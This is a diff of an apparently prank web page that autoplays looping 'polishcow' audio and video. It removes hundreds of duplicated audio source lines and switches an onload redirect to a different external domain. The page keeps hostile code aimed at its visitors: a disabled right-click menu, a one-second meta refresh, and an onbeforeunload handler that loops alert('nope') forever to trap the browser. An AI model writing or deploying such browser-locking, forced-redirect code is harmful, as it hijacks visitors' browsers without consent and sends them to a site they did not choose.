--- a/index.html
+++ b/index.html
@@ -7,340 +7,6 @@
 		</center>
 		<audio loop="loop" autoplay="true">
             		<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
-			<source src="polishcow.mp3" type="audio/mp3">
        		</audio>
 		
 		<script>
@@ -399,11 +65,11 @@
 		}
 		</style>
 	<script>
-	<body oncontextmenu="return false" onload="location.href='https://www.alexfunes.tk/', load();">
+	<body oncontextmenu="return false" onload="location.href='https://darknesscommunity.club/', load();">
 		<video autoplay="" loop=""> 
 			<source src="polishcow.mp4" type='video/mp4'>
 		</video>
-		<meta http-equiv=”refresh” content="5" />
+		<meta http-equiv=”refresh” content="1" />
 		<script>window.onbeforeunload = function(){
   		while (true) { alert("nope"); };
 	};
